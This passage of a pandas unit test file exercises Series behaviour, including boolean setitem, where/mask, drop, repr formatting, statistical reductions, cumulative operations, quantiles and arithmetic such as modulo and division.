Series(np.arange(10), dtype='int64')\n mask = s > 5\n s[mask] = [0] * 4\n expected = Series([0, 1, 2, 3, 4, 5] + [0] * 4, dtype='int64')\n assert_series_equal(s, expected)\n\n s = Series(np.arange(10))\n mask = s > 5\n def f():\n s[mask] = [5,4,3,2,1]\n self.assertRaises(ValueError, f)\n def f():\n s[mask] = [0] * 5\n self.assertRaises(ValueError, f)\n\n # dtype changes\n s = Series([1,2,3,4])\n result = s.where(s>2,np.nan)\n expected = Series([np.nan,np.nan,3,4])\n assert_series_equal(result, expected)\n\n # GH 4667\n # setting with None changes dtype\n s = Series(range(10)).astype(float)\n s[8] = None\n result = s[8]\n self.assertTrue(isnull(result))\n\n s = Series(range(10)).astype(float)\n s[s > 8] = None\n result = s[isnull(s)]\n expected = Series(np.nan,index=[9])\n assert_series_equal(result, expected)\n\n def test_where_setitem_invalid(self):\n\n # GH 2702\n # make sure correct exceptions are raised on invalid list assignment\n\n # slice\n s = Series(list('abc'))\n def f():\n s[0:3] = list(range(27))\n self.assertRaises(ValueError, f)\n\n s[0:3] = list(range(3))\n expected = Series([0,1,2])\n assert_series_equal(s.astype(np.int64), expected, )\n\n # slice with step\n s = Series(list('abcdef'))\n def f():\n s[0:4:2] = list(range(27))\n self.assertRaises(ValueError, f)\n\n s = Series(list('abcdef'))\n s[0:4:2] = list(range(2))\n expected = Series([0,'b',1,'d','e','f'])\n assert_series_equal(s, expected)\n\n # neg slices\n s = Series(list('abcdef'))\n def f():\n s[:-1] = list(range(27))\n self.assertRaises(ValueError, f)\n\n s[-3:-1] = list(range(2))\n expected = Series(['a','b','c',0,1,'f'])\n assert_series_equal(s, expected)\n\n # list\n s = Series(list('abc'))\n def f():\n s[[0,1,2]] = list(range(27))\n self.assertRaises(ValueError, f)\n\n s = Series(list('abc'))\n def f():\n s[[0,1,2]] = list(range(2))\n self.assertRaises(ValueError, f)\n\n # scalar\n s = Series(list('abc'))\n s[0] = list(range(10))\n expected = Series([list(range(10)),'b','c'])\n assert_series_equal(s, expected)\n\n def test_where_broadcast(self):\n # Test a variety of differently sized series\n for size in range(2, 6):\n # Test a variety of boolean indices\n for selection in [np.resize([True, False, False, False, False], size), # First element should be set\n # Set alternating elements]\n np.resize([True, False], size),\n np.resize([False], size)]: # No element should be set\n # Test a variety of different numbers as content\n for item in [2.0, np.nan, np.finfo(np.float).max, np.finfo(np.float).min]:\n # Test numpy arrays, lists and tuples as the input to be\n # broadcast\n for arr in [np.array([item]), [item], (item,)]:\n data = np.arange(size, dtype=float)\n s = Series(data)\n s[selection] = arr\n # Construct the expected series by taking the source\n # data or item based on the selection\n expected = Series([item if use_item else data[i]\n for i, use_item in enumerate(selection)])\n assert_series_equal(s, expected)\n\n def test_where_inplace(self):\n s = Series(np.random.randn(5))\n cond = s > 0\n\n rs = s.copy()\n\n rs.where(cond, inplace=True)\n assert_series_equal(rs.dropna(), s[cond])\n assert_series_equal(rs, s.where(cond))\n\n rs = s.copy()\n rs.where(cond, -s, inplace=True)\n assert_series_equal(rs, s.where(cond, -s))\n\n def test_where_dups(self):\n # GH 4550\n # where crashes with dups in index\n s1 = Series(list(range(3)))\n s2 = Series(list(range(3)))\n comb = pd.concat([s1,s2])\n result = comb.where(comb < 2)\n expected = Series([0,1,np.nan,0,1,np.nan],index=[0,1,2,0,1,2])\n assert_series_equal(result, expected)\n\n # GH 4548\n # inplace updating not working with dups\n comb[comb<1] = 5\n expected = Series([5,1,2,5,1,2],index=[0,1,2,0,1,2])\n assert_series_equal(comb, expected)\n\n comb[comb<2] += 10\n expected = Series([5,11,2,5,11,2],index=[0,1,2,0,1,2])\n assert_series_equal(comb, expected)\n\n def test_mask(self):\n s = Series(np.random.randn(5))\n cond = s > 0\n\n rs = s.where(cond, np.nan)\n assert_series_equal(rs, s.mask(~cond))\n\n def test_drop(self):\n\n # unique\n s = Series([1,2],index=['one','two'])\n expected = Series([1],index=['one'])\n result = s.drop(['two'])\n assert_series_equal(result,expected)\n result = s.drop('two', axis='rows')\n assert_series_equal(result,expected)\n\n # non-unique\n # GH 5248\n s = Series([1,1,2],index=['one','two','one'])\n expected = Series([1,2],index=['one','one'])\n result = s.drop(['two'], axis=0)\n assert_series_equal(result,expected)\n result = s.drop('two')\n assert_series_equal(result,expected)\n\n expected = Series([1],index=['two'])\n result = s.drop(['one'])\n assert_series_equal(result,expected)\n result = s.drop('one')\n assert_series_equal(result,expected)\n\n # single string/tuple-like\n s = Series(range(3),index=list('abc'))\n self.assertRaises(ValueError, s.drop, 'bc')\n self.assertRaises(ValueError, s.drop, ('a',))\n\n # bad axis\n self.assertRaises(ValueError, s.drop, 'one', axis='columns')\n\n # GH 8522\n s = Series([2,3], index=[True, False])\n self.assertTrue(s.index.is_object())\n result = s.drop(True)\n expected = Series([3],index=[False])\n assert_series_equal(result,expected)\n\n def test_ix_setitem(self):\n inds = self.series.index[[3, 4, 7]]\n\n result = self.series.copy()\n result.ix[inds] = 5\n\n expected = self.series.copy()\n expected[[3, 4, 7]] = 5\n assert_series_equal(result, expected)\n\n result.ix[5:10] = 10\n expected[5:10] = 10\n assert_series_equal(result, expected)\n\n # set slice with indices\n d1, d2 = self.series.index[[5, 15]]\n result.ix[d1:d2] = 6\n expected[5:16] = 6 # because it's inclusive\n assert_series_equal(result, expected)\n\n # set index value\n self.series.ix[d1] = 4\n self.series.ix[d2] = 6\n self.assertEqual(self.series[d1], 4)\n self.assertEqual(self.series[d2], 6)\n\n def test_where_numeric_with_string(self):\n # GH 9280\n s = pd.Series([1, 2, 3])\n w = s.where(s>1, 'X')\n\n self.assertFalse(com.is_integer(w[0]))\n self.assertTrue(com.is_integer(w[1]))\n self.assertTrue(com.is_integer(w[2]))\n self.assertTrue(isinstance(w[0], str))\n self.assertTrue(w.dtype == 'object')\n\n w = s.where(s>1, ['X', 'Y', 'Z'])\n self.assertFalse(com.is_integer(w[0]))\n self.assertTrue(com.is_integer(w[1]))\n self.assertTrue(com.is_integer(w[2]))\n self.assertTrue(isinstance(w[0], str))\n self.assertTrue(w.dtype == 'object')\n\n w = s.where(s>1, np.array(['X', 'Y', 'Z']))\n self.assertFalse(com.is_integer(w[0]))\n self.assertTrue(com.is_integer(w[1]))\n self.assertTrue(com.is_integer(w[2]))\n self.assertTrue(isinstance(w[0], str))\n self.assertTrue(w.dtype == 'object')\n\n def test_setitem_boolean(self):\n mask = self.series > self.series.median()\n\n # similiar indexed series\n result = self.series.copy()\n result[mask] = self.series * 2\n expected = self.series * 2\n assert_series_equal(result[mask], expected[mask])\n\n # needs alignment\n result = self.series.copy()\n result[mask] = (self.series * 2)[0:5]\n expected = (self.series * 2)[0:5].reindex_like(self.series)\n expected[-mask] = self.series[mask]\n assert_series_equal(result[mask], expected[mask])\n\n def test_ix_setitem_boolean(self):\n mask = self.series > self.series.median()\n\n result = self.series.copy()\n result.ix[mask] = 0\n expected = self.series\n expected[mask] = 0\n assert_series_equal(result, expected)\n\n def test_ix_setitem_corner(self):\n inds = list(self.series.index[[5, 8, 12]])\n self.series.ix[inds] = 5\n self.assertRaises(Exception, self.series.ix.__setitem__,\n inds + ['foo'], 5)\n\n def test_get_set_boolean_different_order(self):\n ordered = self.series.order()\n\n # setting\n copy = self.series.copy()\n copy[ordered > 0] = 0\n\n expected = self.series.copy()\n expected[expected > 0] = 0\n\n assert_series_equal(copy, expected)\n\n # getting\n sel = self.series[ordered > 0]\n exp = self.series[self.series > 0]\n assert_series_equal(sel, exp)\n\n def test_repr(self):\n str(self.ts)\n str(self.series)\n str(self.series.astype(int))\n str(self.objSeries)\n\n str(Series(tm.randn(1000), index=np.arange(1000)))\n str(Series(tm.randn(1000), index=np.arange(1000, 0, step=-1)))\n\n # empty\n str(self.empty)\n\n # with NaNs\n self.series[5:7] = np.NaN\n str(self.series)\n\n # with Nones\n ots = self.ts.astype('O')\n ots[::2] = None\n repr(ots)\n\n # various names\n for name in ['', 1, 1.2, 'foo', u('\\u03B1\\u03B2\\u03B3'),\n 'loooooooooooooooooooooooooooooooooooooooooooooooooooong',\n ('foo', 'bar', 'baz'),\n (1, 2),\n ('foo', 1, 2.3),\n (u('\\u03B1'), u('\\u03B2'), u('\\u03B3')),\n (u('\\u03B1'), 'bar')]:\n self.series.name = name\n repr(self.series)\n\n biggie = Series(tm.randn(1000), index=np.arange(1000),\n name=('foo', 'bar', 'baz'))\n repr(biggie)\n\n # 0 as name\n ser = Series(np.random.randn(100), name=0)\n rep_str = repr(ser)\n self.assertIn(\"Name: 0\", rep_str)\n\n # tidy repr\n ser = Series(np.random.randn(1001), name=0)\n rep_str = repr(ser)\n self.assertIn(\"Name: 0\", rep_str)\n\n ser = Series([\"a\\n\\r\\tb\"], name=[\"a\\n\\r\\td\"], index=[\"a\\n\\r\\tf\"])\n self.assertFalse(\"\\t\" in repr(ser))\n self.assertFalse(\"\\r\" in repr(ser))\n self.assertFalse(\"a\\n\" in repr(ser))\n\n # with empty series (#4651)\n s = Series([], dtype=np.int64, name='foo')\n self.assertEqual(repr(s), 'Series([], name: foo, dtype: int64)')\n\n s = Series([], dtype=np.int64, name=None)\n self.assertEqual(repr(s), 'Series([], dtype: int64)')\n\n def test_tidy_repr(self):\n a = Series([u(\"\\u05d0\")] * 1000)\n a.name = 'title1'\n repr(a) # should not raise exception\n\n def test_repr_bool_fails(self):\n s = Series([DataFrame(np.random.randn(2, 2)) for i in range(5)])\n\n import sys\n\n buf = StringIO()\n tmp = sys.stderr\n sys.stderr = buf\n try:\n # it works (with no Cython exception barf)!\n repr(s)\n finally:\n sys.stderr = tmp\n self.assertEqual(buf.getvalue(), '')\n\n def test_repr_name_iterable_indexable(self):\n s = Series([1, 2, 3], name=np.int64(3))\n\n # it works!\n repr(s)\n\n s.name = (u(\"\\u05d0\"),) * 2\n repr(s)\n\n def test_repr_should_return_str(self):\n # http://docs.python.org/py3k/reference/datamodel.html#object.__repr__\n # http://docs.python.org/reference/datamodel.html#object.__repr__\n # ...The return value must be a string object.\n\n # (str on py2.x, str (unicode) on py3)\n\n data = [8, 5, 3, 5]\n index1 = [u(\"\\u03c3\"), u(\"\\u03c4\"), u(\"\\u03c5\"), u(\"\\u03c6\")]\n df = Series(data, index=index1)\n self.assertTrue(type(df.__repr__() == str)) # both py2 / 3\n\n def test_repr_max_rows(self):\n # GH 6863\n with pd.option_context('max_rows', None):\n str(Series(range(1001))) # should not raise exception\n\n def test_unicode_string_with_unicode(self):\n df = Series([u(\"\\u05d0\")], name=u(\"\\u05d1\"))\n if compat.PY3:\n str(df)\n else:\n compat.text_type(df)\n\n def test_bytestring_with_unicode(self):\n df = Series([u(\"\\u05d0\")], name=u(\"\\u05d1\"))\n if compat.PY3:\n bytes(df)\n else:\n str(df)\n\n def test_timeseries_repr_object_dtype(self):\n index = Index([datetime(2000, 1, 1) + timedelta(i)\n for i in range(1000)], dtype=object)\n ts = Series(np.random.randn(len(index)), index)\n repr(ts)\n\n ts = tm.makeTimeSeries(1000)\n self.assertTrue(repr(ts).splitlines()[-1].startswith('Freq:'))\n\n ts2 = ts.ix[np.random.randint(0, len(ts) - 1, 400)]\n repr(ts2).splitlines()[-1]\n\n def test_timeseries_periodindex(self):\n # GH2891\n from pandas import period_range\n prng = period_range('1/1/2011', '1/1/2012', freq='M')\n ts = Series(np.random.randn(len(prng)), prng)\n new_ts = self.round_trip_pickle(ts)\n self.assertEqual(new_ts.index.freq, 'M')\n\n def test_iter(self):\n for i, val in enumerate(self.series):\n self.assertEqual(val, self.series[i])\n\n for i, val in enumerate(self.ts):\n self.assertEqual(val, self.ts[i])\n\n def test_keys(self):\n # HACK: By doing this in two stages, we avoid 2to3 wrapping the call\n # to .keys() in a list()\n getkeys = self.ts.keys\n self.assertIs(getkeys(), self.ts.index)\n\n def test_values(self):\n self.assert_numpy_array_equal(self.ts, self.ts.values)\n\n def test_iteritems(self):\n for idx, val in compat.iteritems(self.series):\n self.assertEqual(val, self.series[idx])\n\n for idx, val in compat.iteritems(self.ts):\n self.assertEqual(val, self.ts[idx])\n\n # assert is lazy (genrators don't define reverse, lists do)\n self.assertFalse(hasattr(self.series.iteritems(), 'reverse'))\n\n def test_sum(self):\n self._check_stat_op('sum', np.sum)\n\n def test_sum_inf(self):\n import pandas.core.nanops as nanops\n\n s = Series(np.random.randn(10))\n s2 = s.copy()\n\n s[5:8] = np.inf\n s2[5:8] = np.nan\n\n self.assertTrue(np.isinf(s.sum()))\n\n arr = np.random.randn(100, 100).astype('f4')\n arr[:, 2] = np.inf\n\n with cf.option_context(\"mode.use_inf_as_null\", True):\n assert_almost_equal(s.sum(), s2.sum())\n\n res = nanops.nansum(arr, axis=1)\n self.assertTrue(np.isinf(res).all())\n\n def test_mean(self):\n self._check_stat_op('mean', np.mean)\n\n def test_median(self):\n self._check_stat_op('median', np.median)\n\n # test with integers, test failure\n int_ts = Series(np.ones(10, dtype=int), index=lrange(10))\n self.assertAlmostEqual(np.median(int_ts), int_ts.median())\n\n def test_mode(self):\n s = Series([12, 12, 11, 10, 19, 11])\n exp = Series([11, 12])\n assert_series_equal(s.mode(), exp)\n\n assert_series_equal(Series([1, 2, 3]).mode(), Series([], dtype='int64'))\n\n lst = [5] * 20 + [1] * 10 + [6] * 25\n np.random.shuffle(lst)\n s = Series(lst)\n assert_series_equal(s.mode(), Series([6]))\n\n s = Series([5] * 10)\n assert_series_equal(s.mode(), Series([5]))\n\n s = Series(lst)\n s[0] = np.nan\n assert_series_equal(s.mode(), Series([6.]))\n\n s = Series(list('adfasbasfwewefwefweeeeasdfasnbam'))\n assert_series_equal(s.mode(), Series(['e']))\n\n s = Series(['2011-01-03', '2013-01-02', '1900-05-03'], dtype='M8[ns]')\n assert_series_equal(s.mode(), Series([], dtype=\"M8[ns]\"))\n s = Series(['2011-01-03', '2013-01-02', '1900-05-03', '2011-01-03',\n '2013-01-02'], dtype='M8[ns]')\n assert_series_equal(s.mode(), Series(['2011-01-03', '2013-01-02'],\n dtype='M8[ns]'))\n\n def test_prod(self):\n self._check_stat_op('prod', np.prod)\n\n def test_min(self):\n self._check_stat_op('min', np.min, check_objects=True)\n\n def test_max(self):\n self._check_stat_op('max', np.max, check_objects=True)\n\n def test_var_std(self):\n alt = lambda x: np.std(x, ddof=1)\n self._check_stat_op('std', alt)\n\n alt = lambda x: np.var(x, ddof=1)\n self._check_stat_op('var', alt)\n\n result = self.ts.std(ddof=4)\n expected = np.std(self.ts.values, ddof=4)\n assert_almost_equal(result, expected)\n\n result = self.ts.var(ddof=4)\n expected = np.var(self.ts.values, ddof=4)\n assert_almost_equal(result, expected)\n\n # 1 - element series with ddof=1\n s = self.ts.iloc[[0]]\n result = s.var(ddof=1)\n self.assertTrue(isnull(result))\n\n result = s.std(ddof=1)\n self.assertTrue(isnull(result))\n\n def test_sem(self):\n alt = lambda x: np.std(x, ddof=1)/np.sqrt(len(x))\n self._check_stat_op('sem', alt)\n\n result = self.ts.sem(ddof=4)\n expected = np.std(self.ts.values, ddof=4)/np.sqrt(len(self.ts.values))\n assert_almost_equal(result, expected)\n\n # 1 - element series with ddof=1\n s = self.ts.iloc[[0]]\n result = s.sem(ddof=1)\n self.assertTrue(isnull(result))\n\n def test_skew(self):\n tm._skip_if_no_scipy()\n\n from scipy.stats import skew\n alt = lambda x: skew(x, bias=False)\n self._check_stat_op('skew', alt)\n\n # test corner cases, skew() returns NaN unless there's at least 3 values\n min_N = 3\n for i in range(1, min_N + 1):\n s = Series(np.ones(i))\n df = DataFrame(np.ones((i, i)))\n if i < min_N:\n self.assertTrue(np.isnan(s.skew()))\n self.assertTrue(np.isnan(df.skew()).all())\n else:\n self.assertEqual(0, s.skew())\n self.assertTrue((df.skew() == 0).all())\n\n def test_kurt(self):\n tm._skip_if_no_scipy()\n\n from scipy.stats import kurtosis\n alt = lambda x: kurtosis(x, bias=False)\n self._check_stat_op('kurt', alt)\n\n index = MultiIndex(levels=[['bar'], ['one', 'two', 'three'], [0, 1]],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]])\n s = Series(np.random.randn(6), index=index)\n self.assertAlmostEqual(s.kurt(), s.kurt(level=0)['bar'])\n\n # test corner cases, kurt() returns NaN unless there's at least 4 values\n min_N = 4\n for i in range(1, min_N + 1):\n s = Series(np.ones(i))\n df = DataFrame(np.ones((i, i)))\n if i < min_N:\n self.assertTrue(np.isnan(s.kurt()))\n self.assertTrue(np.isnan(df.kurt()).all())\n else:\n self.assertEqual(0, s.kurt())\n self.assertTrue((df.kurt() == 0).all())\n\n def test_argsort(self):\n self._check_accum_op('argsort')\n argsorted = self.ts.argsort()\n self.assertTrue(issubclass(argsorted.dtype.type, np.integer))\n\n # GH 2967 (introduced bug in 0.11-dev I think)\n s = Series([Timestamp('201301%02d' % (i + 1)) for i in range(5)])\n self.assertEqual(s.dtype, 'datetime64[ns]')\n shifted = s.shift(-1)\n self.assertEqual(shifted.dtype, 'datetime64[ns]')\n self.assertTrue(isnull(shifted[4]))\n\n result = s.argsort()\n expected = Series(lrange(5), dtype='int64')\n assert_series_equal(result, expected)\n\n result = shifted.argsort()\n expected = Series(lrange(4) + [-1], dtype='int64')\n assert_series_equal(result, expected)\n\n def test_argsort_stable(self):\n s = Series(np.random.randint(0, 100, size=10000))\n mindexer = s.argsort(kind='mergesort')\n qindexer = s.argsort()\n\n mexpected = np.argsort(s.values, kind='mergesort')\n qexpected = np.argsort(s.values, kind='quicksort')\n\n self.assert_numpy_array_equal(mindexer, mexpected)\n self.assert_numpy_array_equal(qindexer, qexpected)\n self.assertFalse(np.array_equal(qindexer, mindexer))\n\n def test_reorder_levels(self):\n index = MultiIndex(levels=[['bar'], ['one', 'two', 'three'], [0, 1]],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]],\n names=['L0', 'L1', 'L2'])\n s = Series(np.arange(6), index=index)\n\n # no change, position\n result = s.reorder_levels([0, 1, 2])\n assert_series_equal(s, result)\n\n # no change, labels\n result = s.reorder_levels(['L0', 'L1', 'L2'])\n assert_series_equal(s, result)\n\n # rotate, position\n result = s.reorder_levels([1, 2, 0])\n e_idx = MultiIndex(levels=[['one', 'two', 'three'], [0, 1], ['bar']],\n labels=[[0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1],\n [0, 0, 0, 0, 0, 0]],\n names=['L1', 'L2', 'L0'])\n expected = Series(np.arange(6), index=e_idx)\n assert_series_equal(result, expected)\n\n result = s.reorder_levels([0, 0, 0])\n e_idx = MultiIndex(levels=[['bar'], ['bar'], ['bar']],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0]],\n names=['L0', 'L0', 'L0'])\n expected = Series(range(6), index=e_idx)\n assert_series_equal(result, expected)\n\n result = s.reorder_levels(['L0', 'L0', 'L0'])\n assert_series_equal(result, expected)\n\n def test_cumsum(self):\n self._check_accum_op('cumsum')\n\n def test_cumprod(self):\n self._check_accum_op('cumprod')\n\n def test_cummin(self):\n self.assert_numpy_array_equal(self.ts.cummin(),\n np.minimum.accumulate(np.array(self.ts)))\n ts = self.ts.copy()\n ts[::2] = np.NaN\n result = ts.cummin()[1::2]\n expected = np.minimum.accumulate(ts.valid())\n\n self.assert_numpy_array_equal(result, expected)\n\n def test_cummax(self):\n self.assert_numpy_array_equal(self.ts.cummax(),\n np.maximum.accumulate(np.array(self.ts)))\n ts = self.ts.copy()\n ts[::2] = np.NaN\n result = ts.cummax()[1::2]\n expected = np.maximum.accumulate(ts.valid())\n\n self.assert_numpy_array_equal(result, expected)\n\n def test_cummin_datetime64(self):\n s = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', 'NaT', '2000-1-1', 'NaT', '2000-1-3']))\n\n expected = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', 'NaT', '2000-1-1', 'NaT', '2000-1-1']))\n result = s.cummin(skipna=True)\n self.assert_series_equal(expected, result)\n\n expected = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', '2000-1-2', '2000-1-1', '2000-1-1', '2000-1-1']))\n result = s.cummin(skipna=False)\n self.assert_series_equal(expected, result)\n\n def test_cummax_datetime64(self):\n s = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', 'NaT', '2000-1-1', 'NaT', '2000-1-3']))\n\n expected = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', 'NaT', '2000-1-2', 'NaT', '2000-1-3']))\n result = s.cummax(skipna=True)\n self.assert_series_equal(expected, result)\n\n expected = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', '2000-1-2', '2000-1-2', '2000-1-2', '2000-1-3']))\n result = s.cummax(skipna=False)\n self.assert_series_equal(expected, result)\n\n def test_cummin_timedelta64(self):\n s = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', 'NaT', '1 min', 'NaT', '3 min', ]))\n\n expected = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', 'NaT', '1 min', 'NaT', '1 min', ]))\n result = s.cummin(skipna=True)\n self.assert_series_equal(expected, result)\n\n expected = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', '2 min', '1 min', '1 min', '1 min', ]))\n result = s.cummin(skipna=False)\n self.assert_series_equal(expected, result)\n\n def test_cummax_timedelta64(self):\n s = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', 'NaT', '1 min', 'NaT', '3 min', ]))\n\n expected = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', 'NaT', '2 min', 'NaT', '3 min', ]))\n result = s.cummax(skipna=True)\n self.assert_series_equal(expected, result)\n\n expected = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', '2 min', '2 min', '2 min', '3 min', ]))\n result = s.cummax(skipna=False)\n self.assert_series_equal(expected, result)\n\n def test_npdiff(self):\n raise nose.SkipTest(\"skipping due to Series no longer being an \"\n \"ndarray\")\n\n # no longer works as the return type of np.diff is now nd.array\n s = Series(np.arange(5))\n\n r = np.diff(s)\n assert_series_equal(Series([nan, 0, 0, 0, nan]), r)\n\n def _check_stat_op(self, name, alternate, check_objects=False):\n import pandas.core.nanops as nanops\n\n def testit():\n f = getattr(Series, name)\n\n # add some NaNs\n self.series[5:15] = np.NaN\n\n # idxmax, idxmin, min, and max are valid for dates\n if name not in ['max','min']:\n ds = Series(date_range('1/1/2001', periods=10))\n self.assertRaises(TypeError, f, ds)\n\n # skipna or no\n self.assertTrue(notnull(f(self.series)))\n self.assertTrue(isnull(f(self.series, skipna=False)))\n\n # check the result is correct\n nona = self.series.dropna()\n assert_almost_equal(f(nona), alternate(nona.values))\n assert_almost_equal(f(self.series), alternate(nona.values))\n\n allna = self.series * nan\n self.assertTrue(np.isnan(f(allna)))\n\n # dtype=object with None, it works!\n s = Series([1, 2, 3, None, 5])\n f(s)\n\n # 2888\n l = [0]\n l.extend(lrange(2 ** 40, 2 ** 40+1000))\n s = Series(l, dtype='int64')\n assert_almost_equal(float(f(s)), float(alternate(s.values)))\n\n # check date range\n if check_objects:\n s = Series(bdate_range('1/1/2000', periods=10))\n res = f(s)\n exp = alternate(s)\n self.assertEqual(res, exp)\n\n # Invalid axis.\n self.assertRaises(ValueError, f, self.series, axis=1)\n\n # Unimplemented numeric_only parameter.\n if 'numeric_only' in getargspec(f).args:\n self.assertRaisesRegexp(NotImplementedError, name, f,\n self.series, numeric_only=True)\n\n testit()\n\n try:\n import bottleneck as bn\n nanops._USE_BOTTLENECK = False\n testit()\n nanops._USE_BOTTLENECK = True\n except ImportError:\n pass\n\n def _check_accum_op(self, name):\n func = getattr(np, name)\n self.assert_numpy_array_equal(func(self.ts), func(np.array(self.ts)))\n\n # with missing values\n ts = self.ts.copy()\n ts[::2] = np.NaN\n\n result = func(ts)[1::2]\n expected = func(np.array(ts.valid()))\n\n self.assert_numpy_array_equal(result, expected)\n\n def test_round(self):\n # numpy.round doesn't preserve metadata, probably a numpy bug,\n # re: GH #314\n result = np.round(self.ts, 2)\n expected = Series(np.round(self.ts.values, 2), index=self.ts.index)\n assert_series_equal(result, expected)\n self.assertEqual(result.name, self.ts.name)\n\n def test_prod_numpy16_bug(self):\n s = Series([1., 1., 1.], index=lrange(3))\n result = s.prod()\n self.assertNotIsInstance(result, Series)\n\n def test_quantile(self):\n from numpy import percentile\n\n q = self.ts.quantile(0.1)\n self.assertEqual(q, percentile(self.ts.valid(), 10))\n\n q = self.ts.quantile(0.9)\n self.assertEqual(q, percentile(self.ts.valid(), 90))\n\n # object dtype\n q = Series(self.ts,dtype=object).quantile(0.9)\n self.assertEqual(q, percentile(self.ts.valid(), 90))\n\n # datetime64[ns] dtype\n dts = self.ts.index.to_series()\n q = dts.quantile(.2)\n self.assertEqual(q, Timestamp('2000-01-10 19:12:00'))\n\n # timedelta64[ns] dtype\n tds = dts.diff()\n q = tds.quantile(.25)\n self.assertEqual(q, pd.to_timedelta('24:00:00'))\n\n # GH7661\n result = Series([np.timedelta64('NaT')]).sum()\n self.assertTrue(result is pd.NaT)\n\n def test_quantile_multi(self):\n from numpy import percentile\n\n qs = [.1, .9]\n result = self.ts.quantile(qs)\n expected = pd.Series([percentile(self.ts.valid(), 10),\n percentile(self.ts.valid(), 90)],\n index=qs)\n assert_series_equal(result, expected)\n\n dts = self.ts.index.to_series()\n result = dts.quantile((.2, .2))\n assert_series_equal(result, Series([Timestamp('2000-01-10 19:12:00'),\n Timestamp('2000-01-10 19:12:00')],\n index=[.2, .2]))\n\n def test_append(self):\n appendedSeries = self.series.append(self.objSeries)\n for idx, value in compat.iteritems(appendedSeries):\n if idx in self.series.index:\n self.assertEqual(value, self.series[idx])\n elif idx in self.objSeries.index:\n self.assertEqual(value, self.objSeries[idx])\n else:\n self.fail(\"orphaned index!\")\n\n self.assertRaises(ValueError, self.ts.append, self.ts,\n verify_integrity=True)\n\n def test_append_many(self):\n pieces = [self.ts[:5], self.ts[5:10], self.ts[10:]]\n\n result = pieces[0].append(pieces[1:])\n assert_series_equal(result, self.ts)\n\n def test_all_any(self):\n ts = tm.makeTimeSeries()\n bool_series = ts > 0\n self.assertFalse(bool_series.all())\n self.assertTrue(bool_series.any())\n\n # Alternative types, with implicit 'object' dtype.\n s = Series(['abc', True])\n self.assertEqual('abc', s.any()) # 'abc' || True => 'abc'\n\n def test_all_any_params(self):\n # Check skipna, with implicit 'object' dtype.\n s1 = Series([np.nan, True])\n s2 = Series([np.nan, False])\n self.assertTrue(s1.all(skipna=False)) # nan && True => True\n self.assertTrue(s1.all(skipna=True))\n self.assertTrue(np.isnan(s2.any(skipna=False))) # nan || False => nan\n self.assertFalse(s2.any(skipna=True))\n\n # Check level.\n s = pd.Series([False, False, True, True, False, True],\n index=[0, 0, 1, 1, 2, 2])\n assert_series_equal(s.all(level=0), Series([False, True, False]))\n assert_series_equal(s.any(level=0), Series([False, True, True]))\n\n # bool_only is not implemented with level option.\n self.assertRaises(NotImplementedError, s.any, bool_only=True, level=0)\n self.assertRaises(NotImplementedError, s.all, bool_only=True, level=0)\n\n # bool_only is not implemented alone.\n self.assertRaises(NotImplementedError, s.any, bool_only=True)\n self.assertRaises(NotImplementedError, s.all, bool_only=True)\n\n def test_op_method(self):\n def check(series, other, check_reverse=False):\n simple_ops = ['add', 'sub', 'mul', 'floordiv', 'truediv', 'pow']\n if not compat.PY3:\n simple_ops.append('div')\n\n for opname in simple_ops:\n op = getattr(Series, opname)\n\n if op == 'div':\n alt = operator.truediv\n else:\n alt = getattr(operator, opname)\n\n result = op(series, other)\n expected = alt(series, other)\n tm.assert_almost_equal(result, expected)\n if check_reverse:\n rop = getattr(Series, \"r\" + opname)\n result = rop(series, other)\n expected = alt(other, series)\n tm.assert_almost_equal(result, expected)\n\n check(self.ts, self.ts * 2)\n check(self.ts, self.ts[::2])\n check(self.ts, 5, check_reverse=True)\n check(tm.makeFloatSeries(), tm.makeFloatSeries(), check_reverse=True)\n\n def test_neg(self):\n assert_series_equal(-self.series, -1 * self.series)\n\n def test_invert(self):\n assert_series_equal(-(self.series < 0), ~(self.series < 0))\n\n def test_modulo(self):\n\n # GH3590, modulo as ints\n p = DataFrame({'first': [3, 4, 5, 8], 'second': [0, 0, 0, 3]})\n result = p['first'] % p['second']\n expected = Series(p['first'].values %\n p['second'].values, dtype='float64')\n expected.iloc[0:3] = np.nan\n assert_series_equal(result, expected)\n\n result = p['first'] % 0\n expected = Series(np.nan, index=p.index)\n assert_series_equal(result, expected)\n\n p = p.astype('float64')\n result = p['first'] % p['second']\n expected = Series(p['first'].values % p['second'].values)\n assert_series_equal(result, expected)\n\n p = p.astype('float64')\n result = p['first'] % p['second']\n result2 = p['second'] % p['first']\n self.assertFalse(np.array_equal(result, result2))\n\n # GH 9144\n s = Series([0, 1])\n\n result = s % 0\n expected = Series([nan, nan])\n assert_series_equal(result, expected)\n\n result = 0 % s\n expected = Series([nan, 0.0])\n assert_series_equal(result, expected)\n\n def test_div(self):\n\n # no longer do integer div for any ops, but deal with the 0's\n p = DataFrame({'first': [3, 4, 5, 8], 'second': [0, 0, 0, 3]})\n result = p['first'] / p['second']\n expected = Series(\n p['first'].values.astype(float) / p['second'].values, dtype='float64')\n expected.iloc[0:3] = np.inf\n assert_series_equal(result, expected)\n\n result = p['first'] / 0\n expected = Series(np.inf, index=p.index)\n assert_series_equal(result, expected)\n\n p = p.astype('float64')\n result = p['first'] / p['second']\n expected = Series(p['first'].values / p['second'].values)\n assert_series_equal(result, expected)\n\n p = DataFrame({'first': [3, 4, 5, 8], 'second': [1, 1, 1, 1]})\n result = p['first'] / p['second']\n assert_series_equal(result, p['first'].astype('float64'))\n self.assertFalse(np.array_equal(result, p['second'] / 